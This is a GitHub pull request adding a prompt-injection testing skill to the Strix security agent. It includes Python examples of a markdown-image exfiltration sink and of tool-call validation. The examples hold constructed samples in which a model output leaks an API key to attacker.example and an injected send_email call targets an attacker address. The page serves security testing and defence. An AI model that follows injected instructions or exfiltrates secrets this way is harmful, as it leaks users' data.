
Add LLM Prompt Injection skill (vulnerabilities)#616

Open

ViperDroid wants to merge 2 commits into usestrix:main from ViperDroid:add-llm-injection-skill

Conversation

@ViperDroid


Add LLM Prompt Injection skill (vulnerabilities)

This adds a new skill: strix/skills/vulnerabilities/llm_prompt_injection.md.

Why

Strix targets modern applications, and more and more of them ship LLM-backed features (chatbots, assistants, RAG, agents with tools). Yet the vulnerabilities skill set has no coverage of prompt injection — arguably the most important new class in the OWASP LLM Top 10. This gives agents a focused playbook for a class they will increasingly encounter.

What's included

Following the existing skill format (YAML frontmatter + structured sections):

  • Attack surface: direct vs indirect injection, the tool/agent layer, and output sinks
  • Key vulnerabilities: instruction override / delimiter breakout, indirect injection & RAG poisoning, system-prompt/data leakage, tool/function-call abuse, insecure output handling (LLM→XSS, markdown-image exfiltration), guardrail bypass
  • Exploitation scenarios, testing methodology, validation, false positives, impact, pro tips
  • Emphasis on proving impact at a real sink (tool call, exfil, XSS) rather than model chatter, and on filtering non-deterministic false positives

Notes

  • Docs/skill only — no code changes, so it does not affect tests, linting, or type checks.
  • Matches the structure and depth of existing skills (e.g. open_redirect.md, csrf.md).
  • Complements the separately-proposed CORS misconfiguration skill.
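The PR description above stresses proving impact at a real sink rather than reporting "model chatter". The following is an added illustration of one such sink, markdown-image exfiltration, written for this page; it is not code from the Strix project or from the skill file under review. A permissive renderer turns every image URL the model emits into an outbound GET, so an instruction hidden in a retrieved document can make the model smuggle conversation data out in a query string. The hardened renderer allow-lists the image host and refuses URLs carrying a query or fragment. The host names, the "secret", the model outputs and the allowed-host list are all constructed for the example.

```python
"""Markdown-image exfiltration sink: vulnerable pass-through vs hardened renderer.

Added example for illustration; not part of the Strix skill or project code.
All hosts, outputs and the allow-list below are constructed assumptions.
"""
import re
from urllib.parse import urlparse

# Constructed: what a model answer can look like after it followed an
# instruction hidden in a retrieved document (indirect injection).
INJECTED_OUTPUT = (
    "Here is the summary you asked for.\n\n"
    "![status](https://attacker.example/p.png?d=api_key%3Dsk-live-1234)\n\n"
    "Let me know if you need anything else."
)

# Constructed: a benign answer with an image from the app's own CDN.
BENIGN_OUTPUT = "Done. ![chart](https://cdn.app.example/reports/q1.png)"

# Markdown image syntax: ![alt](url)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

# Assumption: the application only ever serves images from this host.
ALLOWED_IMAGE_HOSTS = {"cdn.app.example"}


def extract_image_urls(markdown: str) -> list[str]:
    """Return every URL a renderer would fetch for the images in `markdown`."""
    return MD_IMAGE.findall(markdown)


def render_vulnerable(markdown: str) -> list[str]:
    """Vulnerable sink: every image URL in the model output becomes an <img src>.

    Returns the URLs the browser (or a server-side link previewer) would GET;
    an attacker-controlled URL here is the proof of impact the skill asks for.
    """
    return extract_image_urls(markdown)


def classify_image_url(url: str) -> str:
    """'ok' for an allow-listed https host with no query/fragment, else the reason."""
    p = urlparse(url)
    if p.scheme != "https":
        return "blocked:scheme"
    if p.hostname not in ALLOWED_IMAGE_HOSTS:
        return "blocked:host"
    if p.query or p.fragment:
        # Exfiltrated data rides in the query string; a static CDN image needs none.
        return "blocked:query"
    return "ok"


def render_hardened(markdown: str) -> tuple[str, list[tuple[str, str]]]:
    """Hardened sink: drop any image whose URL fails the policy.

    Returns the sanitised markdown and the list of (url, reason) pairs that
    were blocked, so a test or a detector can assert on them.
    """
    blocked: list[tuple[str, str]] = []

    def _sub(m: re.Match) -> str:
        url = m.group(1)
        verdict = classify_image_url(url)
        if verdict == "ok":
            return m.group(0)
        blocked.append((url, verdict))
        return "[image removed]"

    return MD_IMAGE.sub(_sub, markdown), blocked


if __name__ == "__main__":
    print("vulnerable would fetch:", render_vulnerable(INJECTED_OUTPUT))
    sanitised, dropped = render_hardened(INJECTED_OUTPUT)
    print("hardened blocked:", dropped)
    print(sanitised)
```

The point for a tester is the difference between `render_vulnerable` and `render_hardened`: a finding is real only when the first list contains an attacker-controlled URL that the deployed renderer would actually request, not when the model merely says it will "include an image".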

@greptile-apps

greptile-apps Bot commented Jul 1, 2026

Contributor

Greptile Summary

This PR adds a new vulnerability skill file, strix/skills/vulnerabilities/llm_prompt_injection.md, that gives agents a structured playbook for testing LLM-backed features for prompt injection and related attack classes.

  • Follows the existing skill format (YAML frontmatter + Attack Surface, Key Vulnerabilities, Framework-Specific, Testing Methodology, Validation, False Positives, Impact, Pro Tips, Summary sections), matching the depth of peers like xss.md and open_redirect.md.
  • Includes a Framework-Specific section covering LangChain/LangGraph, OpenAI Assistants/function calling, Anthropic tool use, LlamaIndex/RAG pipelines, and guardrail layers — providing actionable grep targets per framework.
  • No code, tests, or configuration is touched; the change is documentation-only.

Confidence Score: 5/5

Documentation-only change with no code, configuration, or test modifications — entirely safe to merge.

The single changed file is a new skill markdown document. It is accurate, structurally consistent with existing skills, and introduces no executable code or configuration. The Framework-Specific section (LangChain, OpenAI, Anthropic, LlamaIndex, guardrails) addresses the depth gap noted in the previous review thread. No logical or factual issues were found.

No files require special attention.

Important Files Changed

Filename: strix/skills/vulnerabilities/llm_prompt_injection.md
Overview: New skill file covering LLM prompt injection: well-structured YAML frontmatter, correct section layout matching existing skills, accurate framework-specific guidance (LangChain, OpenAI, Anthropic, LlamaIndex), and a solid testing methodology. No correctness issues found.

Reviews (2): Last reviewed commit: "Add Framework-Specific section (LangChai..."

Comment thread strix/skills/vulnerabilities/llm_prompt_injection.md
@ViperDroid

Author

Great suggestion — you're right that a framework layer matches the depth of xss.md. I've pushed a Framework-Specific section covering:

  • LangChain / LangGraph — AgentExecutor/tool-calling argument injection, sinks to grep
  • OpenAI Assistants / Function Calling — server-side arg validation, file_search indirect injection, Code Interpreter as a sink
  • Anthropic Tool Use — tool_use/tool_result handling differences
  • LlamaIndex / RAG — retrieval hooks and indexed-document injection
  • Guardrail layers (NeMo Guardrails, LLM Guard) — in-band bypass, and checking the guard sees the final merged prompt

It names the exact sinks/hooks an agent should look for, matching the xss.md framework-specific approach. Thanks for the thorough review!
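The comment above points at server-side argument validation of model-issued tool calls as the thing to look for. As an added illustration (not code from the Strix skill, nor from the OpenAI, Anthropic or LangChain SDKs), here is a minimal dispatcher that validates a tool call before executing it: unknown tools, schema drift, type mismatches and an out-of-policy email recipient are all rejected, and the recipient must have been named in the user's own turn rather than introduced by the model after reading a poisoned document. The tool schemas, the allowed mail domain, the `{"name": ..., "arguments": ...}` call shape and the sample user turn and calls are all constructed assumptions.

```python
"""Server-side validation of model-issued tool calls.

Added example for illustration; not part of the Strix skill or any SDK.
Tool schemas, policy, call shape and sample calls are constructed assumptions.
"""
import json

# Assumption: the app exposes exactly these tools with these argument types.
TOOL_SCHEMAS = {
    "send_email": {"to": str, "subject": str, "body": str},
    "lookup_order": {"order_id": str},
}

# Assumption: mail may only be sent to the company's own domain.
ALLOWED_MAIL_DOMAINS = {"app.example"}


class ToolCallRejected(Exception):
    """Raised when a model-issued tool call fails policy; the reason is the message."""


def validate_tool_call(call: dict, user_turn: str) -> dict:
    """Validate a tool call before execution; return it normalised or raise."""
    name = call.get("name")
    args = call.get("arguments", {})
    if isinstance(args, str):
        # Some APIs deliver arguments as a JSON string rather than an object.
        args = json.loads(args)

    schema = TOOL_SCHEMAS.get(name)
    if schema is None:
        raise ToolCallRejected(f"unknown tool: {name!r}")

    # Reject extra or missing keys: an injected call often smuggles in a
    # parameter the tool was never meant to accept.
    extra = set(args) - set(schema)
    missing = set(schema) - set(args)
    if extra or missing:
        raise ToolCallRejected(
            f"schema mismatch: extra={sorted(extra)} missing={sorted(missing)}"
        )
    for key, typ in schema.items():
        if not isinstance(args[key], typ):
            raise ToolCallRejected(f"argument {key!r} must be {typ.__name__}")

    if name == "send_email":
        domain = args["to"].rpartition("@")[2].lower()
        if domain not in ALLOWED_MAIL_DOMAINS:
            raise ToolCallRejected(f"recipient domain not allowed: {domain}")
        # Simple provenance heuristic (assumption): the recipient must appear in
        # the user's own request, not only in retrieved content the model read.
        if args["to"].lower() not in user_turn.lower():
            raise ToolCallRejected("recipient did not originate from the user's request")

    return {"name": name, "arguments": args}


def dispatch(call: dict, user_turn: str) -> tuple[str, str]:
    """Return ('executed', tool_name) or ('rejected', reason) without side effects."""
    try:
        validated = validate_tool_call(call, user_turn)
        return ("executed", validated["name"])
    except ToolCallRejected as exc:
        return ("rejected", str(exc))


# Constructed: the user's request, a tool call the model issued after reading a
# poisoned document, and the call a clean model would have produced.
USER_TURN = "Summarise order 1234 and email the summary to ops@app.example"
INJECTED_CALL = {
    "name": "send_email",
    "arguments": json.dumps(
        {"to": "drop@attacker.example", "subject": "re: order", "body": "..."}
    ),
}
LEGIT_CALL = {
    "name": "send_email",
    "arguments": {"to": "ops@app.example", "subject": "Order 1234", "body": "..."},
}

if __name__ == "__main__":
    print(dispatch(INJECTED_CALL, USER_TURN))
    print(dispatch(LEGIT_CALL, USER_TURN))
```

When testing an agent, the question this encodes is whether the application performs checks like these on the server before the tool runs; if the model's arguments reach the tool unchanged, an injected document controls the tool call, which is the impact the skill asks testers to demonstrate.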

@bearsyankees

Collaborator

@greptile

